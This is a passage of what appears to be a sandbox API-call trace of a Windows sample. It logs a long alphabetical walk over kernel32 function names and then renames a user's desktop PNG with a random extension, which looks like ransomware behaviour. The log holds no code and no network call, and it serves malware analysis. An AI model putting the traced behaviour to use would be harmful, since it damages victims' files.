lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.489] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.489] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.489] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.489] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.489] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.489] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.489] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.490] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.490] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.490] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.490] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.490] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.490] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.490] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.490] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.490] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.490] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.490] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.490] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.490] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.490] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.490] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.490] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.490] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.490] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.490] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.490] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.491] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.491] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.491] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.491] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.491] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.491] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.491] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.491] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.491] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.491] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.491] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.491] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.491] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.491] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.491] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.491] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.491] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.491] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.491] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.492] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.492] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.492] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.492] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.492] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.492] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.492] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.492] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.492] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.492] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.492] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.492] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.492] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.492] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.492] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.492] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.492] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.492] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.492] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.493] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.493] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.493] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.493] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.493] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.493] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.493] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.493] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.493] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.493] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.493] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.493] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.493] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.493] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.493] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.493] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.493] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.493] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.493] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.493] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.494] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.494] lstrlenA (lpString="DELETEATOM") returned 10 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.494] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.494] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.494] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.494] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.494] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.494] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.494] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.494] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.494] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.494] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.494] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.494] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.494] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.494] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.494] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.494] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.494] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.495] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.495] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.495] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.495] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.495] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.495] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.495] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.495] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.495] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.495] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.495] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.495] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.495] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.495] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.495] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.495] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.495] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.495] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.495] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.496] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.496] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.496] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.496] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.496] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.496] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.496] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.496] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png") returned 61 [0083.496] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png.pmgb3yO") returned 69 [0083.496] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngwb1v0y3ceaseztz_k.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png.pmgb3yO" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngwb1v0y3ceaseztz_k.png.pmgb3yo"), dwFlags=0x0) returned 1 [0083.497] VirtualFree (lpAddress=0xfc0000, 